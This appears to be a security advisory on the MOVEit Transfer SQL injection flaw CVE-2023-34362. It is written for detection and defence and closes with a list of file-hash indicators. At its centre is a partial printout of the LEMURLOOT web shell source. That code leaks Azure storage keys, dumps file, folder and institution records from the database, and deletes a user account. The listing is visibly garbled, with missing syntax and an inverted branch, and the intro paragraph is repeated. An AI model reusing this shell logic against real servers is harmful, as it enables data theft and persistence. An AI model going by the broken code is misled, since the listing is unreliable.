MOVEit SQL Injection Vulnerability CVE-2023-34362
A SQL injection vulnerability has been discovered in MOVEit Transfer version 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), which could allow an unauthenticated attacker to access MOVEit Transfer's database without authorization. In addition to performing SQL commands that change or remove database items, an attacker may be able to infer details about the database's structure and contents depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL)

According to Progress, which disclosed the vulnerability publicly on May 31, 2023:
A SQL injection vulnerability has been discovered in MOVEit Transfer version 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), which could allow an unauthenticated attacker to access MOVEit Transfer's database without authorization. In addition to performing SQL commands that change or remove database items, an attacker may be able to infer details about the database's structure and contents depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL).
It has been observed that many MOVEit Transfer SFTP (SSH) servers are exposed to the internet and are vulnerable. The majority of the vulnerable services are located in the USA.
According to Mandiant's analysis report on the zero-day vulnerability in MOVEit, after exploiting the vulnerability the attacker deployed a newly discovered web shell, LEMURLOOT.
The LEMURLOOT web shell is written in C# and targets Microsoft web servers.
Web shell (human2.aspx) — partial, garbled listing; the custom `X-siLock-*` request headers it reads and the `Health Check Service` user it deletes are the artefacts observable in web-server and database logs.
<%@ Page Language="C
<%@ Import Namespace="MOVEit.DMZ.ClassLib" %>
<%@ Import Namespace="MOVEit.DMZ.Application.Contracts.Infrastructure.Data" %>
<%@ Import Namespace="MOVEit.DMZ.Application.Files" %>
<%@ Import Namespace="MOVEit.DMZ.Cryptography.Contracts" %>
<%@ Import Namespace="MOVEit.DMZ.Core.Cryptography" %>
<%@ Import Namespace="MOVEit.DMZ.Application.Contracts.FileSystem" %>
<%@ Import Namespace="MOVEit.DMZ.Core" %>
<%@ Import Namespace="MOVEit.DMZ.Core.Data" %>
<%@ Import Namespace="MOVEit.DMZ.Application.Users" %>
<%@ Import Namespace="MOVEit.DMZ.Application.Contracts.Users.Enum" %>
<%@ Import Namespace="MOVEit.DMZ.Application.Contracts.Users" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.IO.Compression" %>
<script runat="server">
// Opens a database connection through MOVEit's own DbConn/SystemSettings classes,
// i.e. the web shell inherits the application's configured DB credentials rather
// than carrying its own. Returns the DbConn on success, otherwise the null `text`
// (the caller in Page_load distinguishes the two with `r is String`).
// NOTE(review): the `if (` / `flag)` split is an artefact of this copy; as printed
// it returns null when Connect() reports success, so the branches are presumably
// inverted relative to the original file.
private Object connectDB() {
var MySQLConnect = new DbConn(SystemSettings.DatabaseSettings())
bool flag = false
string text = null
flag = MySQLConnect.Connect()
if (
flag) {
return text
return MySQLConnect
// Page-level System.Random instance; only RandomString() below uses it.
private Random random = new Random()
// Returns a `length`-character string drawn from [a-z0-9] using the page's
// `random` field. Where the result is used falls in the truncated part of the
// listing, so its role in the shell cannot be determined from this copy.
public string RandomString(int length) {
const string chars = "abcdefghijklmnopqrstuvwxyz0123456789"
return new string(Enumerable.Repeat(chars, length).Select(s => s[random.Next(s.Length)]).ToArray())
protected void Page_load(object sender, EventArgs e) {
var pass = Request.Headers["X-siLock-Comment"]
String.Equals(pass, "REDACTEDREDACTEDREDACTEDREDACTED")) {
Response.StatusCode = 404
return
Response.AppendHeader("X-siLock-Comment", "comment")
var instid = Request.Headers["X-siLock-Step1"]
string x = null
DbConn MySQLConnect = null
var r = connectDB()
if (r is String) {
Response.Write("OpenConn: Could not connect to DB: " + r)
try {
MySQLConnect = (DbConn) r
if (int.Parse(instid) == -1) {
string azureAccout = SystemSettings.AzureBlobStorageAccount
string azureBlobKey = SystemSettings.AzureBlobKey
string azureBlobContainer = SystemSettings.AzureBlobContainer
Response.AppendHeader("AzureBlobStorageAccount", azureAccout)
Response.AppendHeader("AzureBlobKey", azureBlobKey)
Response.AppendHeader("AzureBlobContainer", azureBlobContainer)
var query = "select f.id, f.instid, f.folderid, filesize, f.Name as Name, u.LoginName as uploader, fr.FolderPath , fr.name as fname from folders fr, files f left join users u on f.UploadUsername = u.Username where f.FolderID = fr.ID"
string reStr = "ID,InstID,FolderID,FileSize,Name,Uploader,FolderPath,FolderName\n"
var set = new RecordSetFactory(MySQLConnect).GetRecordset(query, null, true, out x)
set.EOF) {
while (
reStr += String.Format("{0},{1},{2},{3},{4},{5},{6},{7}\n", set["ID"].Value, set["InstID"].Value, set["FolderID"].Value, set["FileSize"].Value, set["Name"].Value, set["uploader"].Value, set["FolderPath"].Value, set["fname"].Value)
set.MoveNext()
}
reStr += "----------------------------------\nFolderID,InstID,FolderName,Owner,FolderPath\n"
String query1 = "select ID, f.instID, name, u.LoginName as owner, FolderPath from folders f left join users u on f.owner = u.Username"
set = new RecordSetFactory(MySQLConnect).GetRecordset(query1, null, true, out x)
reStr += String.Format("{0},{1},{2},{3},{4}\n", set["id"].Value, set["instID"].Value, set["name"].Value, set["owner"].Value, set["FolderPath"].Value)
reStr += "----------------------------------\nInstID,InstName,ShortName\n"
query1 = "select id, name, shortname from institutions"
reStr += String.Format("{0},{1},{2}\n", set["ID"].Value, set["name"].Value, set["ShortName"].Value)
using(var gzipStream = new GZipStream(Response.OutputStream, CompressionMode.Compress)) {
using(var writer = new StreamWriter(gzipStream, Encoding.UTF8)) {
writer.Write(reStr)
} else if (int.Parse(instid) == -2) {
var query = String.Format("Delete FROM users WHERE RealName='Health Check Service'")
new RecordSetFactory(MySQLConnect).GetRecordset(query, null, true, out x)
} else {
var fileid = Request.Headers["X-siLock-Step3"]
var folderid = Request.Headers["X-siLock-Step2"]
if (fileid == null
folderid == null) {
SessionIDManager Manager = new SessionIDManager()
string NewID = Manager.CreateSessionID(Context)
....
Truncated
IOCs (SHA-256 file hashes)
38e69f4a6d2e81f28ed2dc6df0daf31e73ea365bd2cfc90ebc31441404cca264
3a977446ed70b02864ef8cfa3135d8b134c93ef868a4cc0aa5d3c2a74545725b
b1c299a9fe6076f370178de7b808f36135df16c4e438ef6453a39565ff2ec272
c77438e8657518221613fbce451c664a75f05beea2184a3ae67f30ea71d34f37
702421bcee1785d93271d311f0203da34cc936317e299575b06503945a6ea1e0
387cee566aedbafa8c114ed1c6b98d8b9b65e9f178cf2f6ae2f5ac441082747a
4359aead416b1b2df8ad9e53c497806403a2253b7e13c03317fc08ad3b0b95bf
daaa102d82550f97642887514093c98ccd51735e025995c2cc14718330a856f4
6015fed13c5510bbb89b0a5302c8b95a5b811982ff6de9930725c4630ec4011d
9d1723777de67bc7e11678db800d2a32de3bcd6c40a629cd165e3f7bbace8ead
c56bcb513248885673645ff1df44d3661a75cfacdce485535da898aa9ba320d4
0ea05169d111415903a1098110c34cdbbd390c23016cd4e179dd9ef507104495
d49cf23d83b2743c573ba383bf6f3c28da41ac5f745cde41ef8cd1344528c195
5b566de1aa4b2f79f579cdac6283b33e98fdc8c1cfa6211a787f8156848d67ff
f0d85b65b9f6942c75271209138ab24a73da29a06bc6cc4faeddcb825058c09d
fe5f8388ccea7c548d587d1e2843921c038a9f4ddad3cb03f3aa8a45c29c6a2f
9e89d9f045664996067a05610ea2b0ad4f7f502f73d84321fb07861348fdc24a
ea433739fb708f5d25c937925e499c8d2228bf245653ee89a6f3d26a5fd00b7a
cf23ea0d63b4c4c348865cefd70c35727ea8c82ba86d56635e488d816e60ea45
2413b5d0750c23b07999ec33a5b4930be224b661aaf290a0118db803f31acbc5
348e435196dd795e1ec31169bd111c7ec964e5a6ab525a562b17f10de0ab031d
b9a0baf82feb08e42fa6ca53e9ec379e79fbe8362a7dac6150eb39c2d33d94ad
a1269294254e958e0e58fc0fe887ebbc4201d5c266557f09c3f37542bd6d53d7
48367d94ccb4411f15d7ef9c455c92125f3ad812f2363c4d2e949ce1b615429a
d477ec94e522b8d741f46b2c00291da05c72d21c359244ccb1c211c12b635899
3ab73ea9aebf271e5f3ed701286701d0be688bf7ad4fb276cb4fbe35c8af8409






